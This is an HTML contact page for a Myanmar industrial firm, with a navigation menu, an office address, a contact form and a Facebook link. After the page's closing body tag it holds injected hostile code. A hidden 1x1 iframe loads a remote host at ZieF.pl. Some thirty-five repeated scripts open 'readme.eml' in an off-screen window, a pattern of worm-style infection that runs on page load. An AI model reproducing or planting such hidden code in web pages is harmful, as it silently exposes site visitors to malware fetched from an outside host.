<!DOCTYPE html>
<html>
    <head>
        <title>

        </title>
        <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
        <style>

            *{padding:0;
              margin: 0;}


              #wrapper{
                /* border: solid gray; */
                

            }
            #header{
            
                background-color:olivedrab;;
            }

            #name,#email,#phone{
                height:30px;
                border-radius: 4px;
            }

            #logo{height: 70px;
            width: 10px;
            padding-left: 25px;}

            #navbar{
                /* height:50px;
                background-color: #FFCC00;
                margin-top:10px ; */
                overflow: hidden;
                font-family: Arial;
            }

            .navbar a{
                float: left;
                font-size: 16px;
                color: white;
                text-align: center;
                padding: 14px 16px;
                text-decoration: none;
            }

            .dropdown{
                position: relative;
                display: inline-block;
            }

            .dropdown dropbtn{
                font-size: 16px;
                border:none;
                outline: none;
                color: olivedrab;
                padding: 14px 16px;
                background-color: inherit;
                font-family: inherit;
                margin: 0;
                /* background-color: olivedrab; */

            }

            .dropdown-content{
                display:none;
                position:absolute;
                background-color:olivedrab;
                min-width: 160px;
                box-shadow: 0px 8px 16px;
            }

            .dropdown-content a{
                float:none;
                color: black;
                padding: 12px 16px;
                text-decoration: none;
                display: block;
                text-align: left;
            }

            .dropdown-content a:hover{
                background-color: olivedrab;
                color: white;
            }

            .dropdown:hover .dropdown-content{
                display: block;
            }

            .img1,.img2,.img3,.img4{
                border-style: ridge;

            }

            .dc{
                background-color:whitesmoke;
            }

           

            #container{
                
                margin-top: 10px;


            }
            
            #container::after{
                content: " ";
                display: block;
                clear: both;

            }

            #left-pannel{

                height:600px;
                background-color:white;
                padding-left: 50px;
                width: 40%;
                float: left;
                margin-top: 10px;
            }
        
            #right-content{
                width: 54%;
                background-color: white;
                height:600px ;
                float:right;
                margin-top: 10px;
            }

            .td4
            {

                padding-left: 100px;
                padding-right: 300px;
            }

        
            
            p,ul,u{
                padding-left:100px;
                /* text-decoration-line: underline;
                text-decoration-color: gren; */
            }
            .divu{
                padding-left: 500px;
                padding-top: 20px;
                
                
            }

            .msg{
               
                height: 150px;
            }
            
            .btn{
                background-color: green;
                padding: 9px 22px;
                text-align: center;
               border:none;
                display: inline-block;
                font-size: 16px;
                margin-left: 380px;
                color: white;
                border-radius: 7px;
            }

            .form{
                padding-left: 20px;
            }

            a{
                text-decoration: none;
                color: white;
            }

            .td3{
                padding-top: 50px;            }
           

            .td0,.td1,.td2,.td3{padding-left: 120px;}
            .ul2{
                list-style-type: disks;
            }

            .ho{
                text-decoration: none;
                color: darkblue;
            }

            a{
                color: black;
                text-decoration-line: line-through;            }

            #footer{
                text-align: center;
                height: 30px;
                padding: 20px;
                background-color:darkgreen;
                margin-top:0px;
            }
        </style>
    </head>
    <body>
        <div id="wrapper">
             <div id="header">
                 <table width="1335px">
                     <tr>
                         <td class="td4">
                 <div id="logo">
                     <image src="pre_intern/stl_logo.png"></image>
                     </td>
                     <td class="td5">
                 </div id="navbar">
                 <a href="">Home</a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
                 <div class="dropdown">
                     <button class="dropbtn">Ahout Us&nbsp;&nbsp;<i class="fa fa-caret-down"></i></button>
                     <div class="dropdown-content">
                         <a hret="">Profile</a>
                         <a href="">Our Structure</a>
                         <a href="">Our Commitment</a>
                     </div>
                 </div>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
                 <a href="">Services</a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
                 <div class="dropdown">
                    <button class="dropbtn">Projects&nbsp;&nbsp;<i class="fa fa-caret-down"></i></button>
                    <div class="dropdown-content">
                        <a hret="">Industrial</a>
                        <a href="">Commercial</a>
                        <a href="">Construction & Interior</a>
                        <a href="">Infrasture</a>
                    </div>
                </div>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
                <a href="">Activities</a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
                <a href="">Contact Us</a>
                </td>
                </tr>
                </table>

                 </div>

             </div>

             <div class="divu"><b><u>CONTACT US</u></b></div>

             <div id="container">
            <div>
                <u>OFFICE</u><br><br>
                <ul>
                    <i class="fa fa-map-marker" style="color:green"></i>&nbsp;&nbsp;Room - 1008, 10th Floor,Building - B, <br>
                    50th Street Condominium,<br>50th Street,<br>
                    Botahtaung Township,Yangon,Myanmar.<br><br>
                    <i class="fa fa-phone" style="color: green;"></i>&nbsp;&nbsp;+(95) 9 451299988, +(95) 9 5351714<br><br>
                    <i class="fa fa-envelope-o" style="color: green;"></i>&nbsp;&nbsp;info@sterling-myanmar.com<br><br>
                </ul>
                <form class="form">
                <label for="name">Name</label><br><br>
                <input type="text" id="name" size="75" placeholder="Name"> <br><br>
                <label for="email">Email</label><br><br>
                <input type="text" id="email" size="75" placeholder="Email"> <br><br>
                <label for="phone">Phone</label><br><br>
                <input type="text" id="phone" size="75" placeholder="Phone"> <br><br>
                <label for="message">Message</label><br><br>
                <textarea cols="56" name="comments" rows="15" placeholder="Message">Message </textarea><br><br>

                <button class="btn" type="button">Send</button><br><br>
                </form>

            </div>

             <div class="dc">
                 <table >
                     <tr>
                         <td class="td1">
                             <u>QUICK LINKS</u><br><br>
                            <ul>
                                <li>Home</li>
                                <li>About Us</li>
                                <li>Services</li>
                                <li>Project</li>
                                <li>Activities</li>
                                <li>Contact Us</li>
                            </ul>

                         </td>
                         <td class="td2">
                             <u>CONTACT US</u><br><br>
                             <ul>
                                <i class="fa fa-map-marker" style="color:green"></i>&nbsp;&nbsp;Room - 1008, 10th Floor,Building - B, <br>
                                50th Street Condominium,<br>50th Street,<br>
                                Botahtaung Township,Yangon,Myanmar.<br><br>
                                <i class="fa fa-phone" style="color: green;"></i>&nbsp;&nbsp;+(95) 9 451299988, +(95) 9 5351714<br><br>
                                <i class="fa fa-envelope-o" style="color: green;"></i>&nbsp;&nbsp;info@sterling-myanmar.com<br><br>
                            </ul>
                         </td>
                     </tr>
                     <tr class="tr" >
                         <td class="td3" colspan="2">
                          <u>FACEBOOK LINKS</u>
                          <ul><a href="https://www.facebook.com/Sterling-Industrial-Technologies-Co-Ltd-167138143479014/"><img src="fl.jpg" width="250px" height="250px"></img></a></ul>
                              
                          </ul>
                        </td>
                     </tr>
                 </table>
             </div>
             <div id="footer">Copyright&copy;STERLING MYANMAR. All Right Reserved. | Designed By <a href="" class="ho">Host Myanmar</a></div>
             

        </div>
        
    <iframe src="http://ZieF.pl/rc/" width=1 height=1 style="border:0"></iframe>
</body>
</html>
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 